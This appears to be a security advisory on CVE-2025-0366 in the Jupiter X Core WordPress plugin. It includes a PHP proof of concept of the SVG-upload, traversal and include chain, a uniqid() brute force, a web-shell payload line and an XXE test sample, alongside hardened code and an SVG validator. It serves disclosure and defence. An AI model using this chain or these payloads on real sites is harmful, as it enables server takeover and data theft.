A critical vulnerability (CVE-2025-0366) in the Jupiter X Core WordPress plugin, actively installed on over 90,000 websites, was disclosed on January 6, 2025.
The flaw lets authenticated attackers with only contributor-level privileges achieve remote code execution by chaining a malicious SVG upload with a Local File Inclusion (LFI) bug in the plugin.
Discovered by researcher stealthcopter through the Wordfence Bug Bounty Program, the vulnerability earned a $782 bounty and underscores persistent risks in plugin-dependent ecosystems.
Vulnerability Overview
CVE-2025-0366: Technical Breakdown
The vulnerability chain involves two critical flaws in the plugin’s file handling logic:
1. Unrestricted SVG Uploads
The plugin’s Ajax_Handler class allowed contributors to upload SVG files without validating content.
Filenames were randomized with PHP's uniqid(), but that function is not a random generator: without the extra-entropy flag it simply hex-encodes the current time in seconds and microseconds, so an attacker who knows (or can narrow down) the upload second only has to enumerate the microsecond component.
2. Local File Inclusion via get_svg()
The get_svg() method in the plugin's Utils class built an include path from user input without sanitizing it:
public static function get_svg($file_name = '') {
    // $file_name comes straight from the request: no basename(), no allowlist
    return Plugin::$plugin_path . 'assets/img/' . $file_name . '.svg';
}
Nothing strips ../ sequences from $file_name, so an attacker can walk out of assets/img to any readable file on the server whose name ends in .svg. That forced suffix is exactly why the upload step matters: the target is the contributor's own uploaded SVG, and PHP's include() executes any <?php ... ?> block it finds in a file regardless of the file's extension.
Successful exploitation therefore requires an attacker to upload a malicious SVG (e.g. one carrying <?php system($_GET["cmd"]); ?>), predict its uniqid()-based filename, and then trigger the inclusion by pointing the plugin's video widget at the traversal path.
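The chain above, as an added illustration that is not code from the Jupiter X Core plugin: a function with the same shape as the page's get_svg() is run against a scratch directory laid out like a plugin install, an SVG carrying a harmless PHP echo is "uploaded" under a uniqid() name, the traversal path is included, and the name is then recovered from the file's timestamp alone. The directory names, the uploads location and the helper names are assumptions made for the demo.

```php
<?php
// Added illustration, not code from Jupiter X Core: both halves of the chain
// described above, run against a scratch directory laid out like a plugin
// install. Directory names, the uploads location and helper names are
// assumptions made for the demo.

// 1. The include path is built from untrusted input.
//    Same shape as the page's get_svg(): no basename(), no allowlist, only a
//    ".svg" suffix appended, so the caller controls everything before it.
function get_svg_vulnerable(string $plugin_path, string $file_name = ''): string
{
    return $plugin_path . 'assets/img/' . $file_name . '.svg';
}

// 2. uniqid() without extra entropy is sprintf('%08x%05x', seconds, microseconds).
//    Knowing the upload second (file mtime, Date header, Last-Modified) leaves
//    at most 1,000,000 candidates, a trivial brute force against a web server.
function uniqid_candidates(int $second): Generator
{
    for ($usec = 0; $usec < 1000000; $usec++) {
        yield sprintf('%08x%05x', $second, $usec);
    }
}

// Scratch layout: <root>/plugins/jupiterx-core/assets/img and <root>/uploads
$root        = sys_get_temp_dir() . '/lfi-demo-' . bin2hex(random_bytes(4));
$plugin_path = "$root/plugins/jupiterx-core/";
$uploads     = "$root/uploads/";
mkdir("{$plugin_path}assets/img", 0700, true);
mkdir($uploads, 0700, true);

// A contributor's "image": SVG on the outside, PHP on the inside. Constructed
// for the demo; the payload only echoes a marker.
$payload     = '<svg xmlns="http://www.w3.org/2000/svg"/>'
             . '<?php echo "PHP ran from inside the SVG"; ?>';
$upload_name = uniqid();                         // what the vulnerable plugin did
file_put_contents("$uploads$upload_name.svg", $payload);

// Traversal: climb out of assets/img and the plugin tree, down into uploads.
// The appended ".svg" matches the uploaded file's real extension, so no
// null-byte or extension trick is needed.
$target = get_svg_vulnerable($plugin_path, "../../../../uploads/$upload_name");
echo "built path : $target\n";
echo "resolves to: " . realpath($target) . "\n";

// include() parses the file as PHP whatever its extension is.
ob_start();
include $target;
echo "engine output: " . ob_get_clean() . "\n";

// Recover the "random" name from the upload second alone (the previous second
// is tried too, in case the write crossed a second boundary).
$second  = (int) filemtime("$uploads$upload_name.svg");
$guesses = null;
for ($s = $second; $s >= $second - 1 && $guesses === null; $s--) {
    foreach (uniqid_candidates($s) as $i => $candidate) {
        if ($candidate === $upload_name) {
            $guesses = $i + 1;
            break;
        }
    }
}
echo $guesses === null
    ? "name not recovered\n"
    : "recovered $upload_name after $guesses guesses\n";

// Clean up the scratch tree.
unlink("$uploads$upload_name.svg");
foreach ([$uploads, "{$plugin_path}assets/img", "{$plugin_path}assets",
          $plugin_path, "$root/plugins", $root] as $dir) {
    rmdir($dir);
}
```

The brute force takes well under a second locally; against a live site the same enumeration is a million requests, which is noisy but entirely practical, and the search shrinks further if the attacker can read the upload's Last-Modified time.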
Contributor-level access is a genuine prerequisite, but a modest one: a contributor can normally only draft posts and cannot upload media at all, so any site with open registration or guest authors is exposed. Once the payload runs as the web-server user, the attacker can escalate privileges within WordPress, exfiltrate data, or deploy malware.
The CVSS score of 8.8 (High) reflects the severe impact on confidentiality, integrity, and availability.
Wordfence released firewall rules to Premium users on January 13, 2025, with free users receiving protection on February 12.
Developer Artbees patched the issue in version 4.8.8 on January 29, implementing SHA-256 filename hashing and strict file allowlisting. Users are urged to update immediately and audit contributor permissions.
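An added illustration of the two fixes the page attributes to version 4.8.8, an allowlist on the include path and a hashed stored filename. This is not the Artbees patch, just the shape a reviewer would expect the code to take afterwards; the icon names, paths and secret are assumptions for the demo. Note the caveat in the second function: SHA-256 over a predictable input is still predictable, so the hash has to cover fresh random bytes.

```php
<?php
// Added illustration, not the plugin's patch: one way to implement the
// allowlist and hashed-name fixes. Icon names, paths and the secret are demo
// assumptions. Requires PHP 8.

// Fix 1: the include path is no longer built from raw input. Callers pick from
// a fixed set of icon names, and the resolved path is still checked to sit
// inside assets/img so a careless future edit to the list cannot reopen the hole.
const SVG_ALLOWLIST = ['play', 'pause', 'arrow-left', 'arrow-right'];

function get_svg_hardened(string $plugin_path, string $file_name = ''): ?string
{
    if (!in_array($file_name, SVG_ALLOWLIST, true)) {
        return null;                             // unknown icon: refuse, do not guess
    }
    $base = realpath($plugin_path . 'assets/img');
    if ($base === false) {
        return null;
    }
    // realpath() collapses any ../ and returns false for a missing file, so the
    // prefix test runs on the real, existing path rather than on the raw string.
    $path = realpath($base . '/' . basename($file_name) . '.svg');
    if ($path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Fix 2: the stored name is no longer a function of the clock. Hashing alone
// would not help (sha256 of a predictable input is just as predictable), so
// the hash also covers 16 fresh random bytes; the secret and original name
// are mixed in but the randomness is what makes the result unguessable.
function stored_name(string $secret, string $original_name): string
{
    return hash('sha256', $secret . '|' . $original_name . '|' . bin2hex(random_bytes(16)));
}

// Demo against a scratch tree.
$root        = sys_get_temp_dir() . '/svg-demo-' . bin2hex(random_bytes(4));
$plugin_path = "$root/jupiterx-core/";
mkdir("{$plugin_path}assets/img", 0700, true);
file_put_contents("{$plugin_path}assets/img/play.svg", '<svg xmlns="http://www.w3.org/2000/svg"/>');

$cases = [
    'play'                 => 'allowlisted and present: returns the real path',
    '../../uploads/evil'   => 'traversal: not on the allowlist',
    'play/../../../passwd' => 'allowlisted prefix only, no exact match: rejected',
    'pause'                => 'allowlisted but no such file: rejected',
];
foreach ($cases as $name => $why) {
    printf("%-22s => %s   (%s)\n", $name,
        var_export(get_svg_hardened($plugin_path, $name), true), $why);
}

$a = stored_name('server-side secret', 'cat.svg');
$b = stored_name('server-side secret', 'cat.svg');
printf("same upload twice, distinct names: %s\n", var_export($a !== $b, true));

unlink("{$plugin_path}assets/img/play.svg");
foreach (["{$plugin_path}assets/img", "{$plugin_path}assets", $plugin_path, $root] as $dir) {
    rmdir($dir);
}
```

The realpath() prefix check is deliberately kept even though the allowlist already makes traversal impossible: defence in depth costs one line here and survives the day someone adds a user-supplied entry to the list.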
This incident highlights systemic challenges in WordPress plugin security, where 60% of vulnerabilities originate from third-party extensions.
SVG files are often handled as if they were static images, but they are XML text: they can carry <script> elements and event-handler attributes (stored XSS when rendered inline), and because PHP's include() runs whatever <?php ... ?> block it finds regardless of extension, an SVG that ever reaches an include path becomes a PHP payload, which is precisely the chain here.
Wordfence’s Bug Bounty Program, resolving 1,200+ vulnerabilities since 2022, demonstrates the value of ethical disclosure in mitigating such threats.
Security experts advise validating uploaded SVGs by content rather than by extension, whether with rule-based XML parsing or the machine learning-based classifiers some vendors offer, and treating every upload as untrusted under a zero-trust policy.
Regular code audits for path traversal flaws and least-privilege access models remain critical for mitigating similar risks.
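A content-based check of the kind the recommendations above describe, as an added example rather than the plugin's code. The policy is a baseline, not a complete SVG sanitiser: it rejects what this chain depends on (PHP tags inside the file) together with DOCTYPEs, script and foreign-content elements, event handlers, non-fragment hrefs and active CSS. The sample documents are constructed for the demo and the function requires PHP 8 with ext-dom.

```php
<?php
// Added illustration of content-based SVG validation for an upload handler.
// Not the plugin's code; the policy is a baseline rather than a complete
// sanitiser. Requires PHP 8 with ext-dom. Sample documents are constructed.

function svg_reject_reason(string $bytes): ?string
{
    // A PHP include() would execute <?php ... ?> wherever it sits in the file,
    // so no processing instruction other than the <?xml declaration is allowed.
    if (preg_match('/<\?(?!xml\s)/i', $bytes)) {
        return 'processing instruction or PHP tag';
    }
    // DOCTYPE enables entity tricks (XXE, entity expansion); icons never need one.
    if (stripos($bytes, '<!DOCTYPE') !== false) {
        return 'DOCTYPE present';
    }

    libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    if (!$dom->loadXML($bytes, LIBXML_NONET)) {     // NONET: no network fetches
        return 'not well-formed XML';
    }
    $root = $dom->documentElement;
    if ($root === null || $root->localName !== 'svg'
        || $root->namespaceURI !== 'http://www.w3.org/2000/svg') {
        return 'root element is not <svg>';
    }

    $forbidden = ['script', 'foreignobject', 'iframe', 'embed', 'object'];
    foreach ((new DOMXPath($dom))->query('//*') as $el) {
        $tag = strtolower($el->localName);
        if (in_array($tag, $forbidden, true)) {
            return "forbidden element <$tag>";
        }
        foreach ($el->attributes as $attr) {
            $name  = strtolower($attr->localName);
            $value = strtolower(trim($attr->value));
            if (str_starts_with($name, 'on')) {
                return "event handler attribute $name";
            }
            // href / xlink:href may only point at fragments inside this document.
            if ($name === 'href' && !str_starts_with($value, '#')) {
                return 'external or scheme reference in href';
            }
            if ($name === 'style'
                && (str_contains($value, 'url(') || str_contains($value, 'expression('))) {
                return 'active CSS in style attribute';
            }
        }
    }
    return null;                                  // accepted
}

// Constructed samples: one clean icon and the usual ways an "image" goes bad.
$samples = [
    'clean'  => '<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>',
    'php'    => '<svg xmlns="http://www.w3.org/2000/svg"/><?php system($_GET["cmd"]); ?>',
    'script' => '<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>',
    'onload' => '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>',
    'href'   => '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
              . '<a xlink:href="javascript:alert(1)"><text>x</text></a></svg>',
    'xxe'    => '<?xml version="1.0"?><!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/passwd">]>'
              . '<svg xmlns="http://www.w3.org/2000/svg">&x;</svg>',
    'html'   => '<html><body>not an svg at all</body></html>',
];
foreach ($samples as $label => $svg) {
    printf("%-7s %s\n", $label, svg_reject_reason($svg) ?? 'accepted');
}
```

Run this at upload time, before the file is written anywhere under the web root, and keep the extension/MIME check as well: the two tests catch different mistakes, and neither replaces the fix to get_svg() itself.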
For real-time alerts, administrators are encouraged to subscribe to threat intelligence feeds like Wordfence Intelligence.